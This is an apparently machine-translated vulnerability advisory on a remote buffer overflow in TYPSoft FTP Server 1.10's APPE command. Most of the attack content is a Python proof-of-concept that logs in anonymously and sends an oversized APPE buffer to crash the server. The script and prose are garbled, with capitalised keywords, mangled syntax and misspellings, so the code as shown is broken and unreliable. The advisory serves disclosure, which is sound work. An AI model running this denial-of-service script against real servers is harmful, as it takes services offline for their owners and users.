Remote buffer overflow vulnerability in TYPSoft FTP Server 'appe' command

Release date: 2012-03-19
Updated on: 2012-03-20

Affected Systems:
TYPSoft FTP Server 1.10
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52554

TYPSoft FTP Server is an easy-to-use FTP service program.

The TYPSoft FTP Server has a remote buffer overflow vulnerability when processing specially crafted APPE commands. Attackers can exploit this vulnerability to execute arbitrary code.

<* Source: Brock Haun
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Brock Haun () provides the following test methods:

#! /Usr/bin/python
Import socket, sys
If len (sys. argv )! = 2:
Print '\ n \ t [*] Usage:./' + sys. argv [0] + '<target host>'
Sys. exit (1)
Print '\ n \ t [*] TypesoftFTP Server 1.1 Remote DoS (APPE) by Brock haun'
Host = sys. argv [1]
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Buffer = 'a ../'+' \ x41 '* 100
Print '\ n \ t [*] Sending crash buffer ("A ../+ \ x41 * 100 ").'
S. connect (host, 21 ))
Data = s. recv (1024)
S. send ('user anonymous' + '\ r \ n ')
Data = s. recv (1024)
S. send ('pass anonus us' + '\ r \ n ')
Data = s. recv (1024)
S. send ('appe '+ buffer +' \ r \ n ')
Print '\ n \ t [*] Done! Target shoshould be unresponsive! '
S. close ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

TYPSoft
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://en.typsoft.com/